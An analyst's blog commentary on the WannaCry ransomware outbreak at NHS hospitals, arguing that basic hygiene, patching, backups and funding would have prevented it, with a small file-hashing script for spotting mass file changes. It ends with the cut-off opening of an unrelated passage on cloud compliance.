In the last couple of years, we’ve learned about several major ransomware families like CryptoLocker and CryptoWall, which managed to collect millions of dollars in ransom before they were finally taken down by the authorities. Unfortunately, new strains constantly appear to evade antivirus detection and to target new groups of victims around the world. The WannaCry ransomware that hit the hospitals in Britain wasn’t in fact targeting the NHS specifically – within just a few hours of being identified, it had already spread around the world, affecting targets in nearly 100 countries, including large telecommunications companies in Spain and government agencies in Russia.
Personally, I find it hard to believe that this was the original intention of the people behind this malware campaign. Rather, it looks like “a job done too well”, which led to an uncontrolled spread far beyond what was initially planned. A notable fact about this strain, however, is that it exploits a particular vulnerability in Microsoft Windows that had been weaponized by the NSA and became public in April after a leak by the Shadow Brokers group.
Although this exploit had been patched by Microsoft even before the leak, a huge number of computers around the world have not yet been updated. This, of course, includes the British hospitals, which still largely run extremely outdated computers with Windows XP. Without the budget needed to upgrade and maintain their IT systems, without properly staffed IT departments and, last but not least, without proper user education, the whole IT infrastructure of the NHS was basically a huge ticking bomb, which finally went off today.
So, what can we do to avoid being hit by ransomware like this? It is worth stressing again that resilience against ransomware attacks is a matter of the most basic “cybersecurity hygiene” practices. My colleague John Tolbert outlined them in a blog post a month ago. We are planning to publish additional reports on this topic in the near future, including a Leadership Compass on antimalware and endpoint security solutions, so watch this space for new announcements.
There is really nothing complicated about maintaining proper backups and not clicking on attachments in phishing mails, so if an organization was affected by ransomware, it is a strong indicator that its problems lie beyond the realm of technology. For several years, we’ve been talking about a similar divide in the approaches to cybersecurity between IT and OT. But where OT experts at least have their reasons for neglecting IT security in favor of safety and process continuity, the glaring disregard for the most basic security best practices in many public-sector institutions can only be attributed to insufficient funding and the resulting massive lack of qualified personnel – personnel needed not just to operate and secure IT infrastructures, but to continuously educate users about the latest types of cyberthreats. Unfortunately, the recent cuts in NHS funding do not promise any positive changes for British hospitals.
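How simple can this hygiene be? The sketch below illustrates the crudest possible backup sanity check: record a hash for every file and compare snapshots over time. Ransomware that encrypts files in place changes every hash at once, so a sudden mass of changed files is an immediate red flag. This is a toy illustration of the principle, not a backup product; the function names are mine.

```python
import hashlib
import pathlib

def snapshot_hashes(root):
    """Record a SHA-256 hash for every file under `root`.
    Comparing two snapshots taken at different times is a minimal
    integrity baseline for a backup set."""
    root = pathlib.Path(root)
    return {
        str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*") if p.is_file()
    }

def changed_files(before, after):
    """Paths whose content differs (or vanished) between two snapshots."""
    return sorted(p for p in before if after.get(p) != before[p])
```

In practice, of course, backups must also be kept offline or versioned, since ransomware that can reach a live backup share will happily encrypt that too. The point is only that the technology involved is trivial; what fails in affected organizations is the process.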
There is a legal aspect to the problem as well. Whereas oil rigs, nuclear power plants and water supplies are rightfully classified as critical infrastructure, with special government programs created to protect them, hospitals are somehow not yet seen as critical, although many lives obviously depend on them. If an attack on a power plant can rightfully be considered an act of terrorism, why isn’t disrupting critical medical services?
Quite frankly, I very much hope that, regardless of the motives of the people behind this ransomware, cybersecurity experts and international law enforcement agencies team up to find them as quickly as possible and come down on them like a ton of bricks, if only for the sake of sending a final warning to other cybercriminals. Because if they don’t, we can only brace ourselves for more catastrophes in the future.
Whether public, private or hybrid clouds, whether SaaS, IaaS or PaaS: these cloud computing approaches differ in particular with respect to whether the processing sites and parties can be determined, and whether the user has any influence on the geographical, qualitative and infrastructural conditions of the services provided. This makes it difficult to meet all compliance requirements, particularly in the fields of data protection and data security. The decisive factors are the transparency, controllability and influenceability of the service provider and his [...]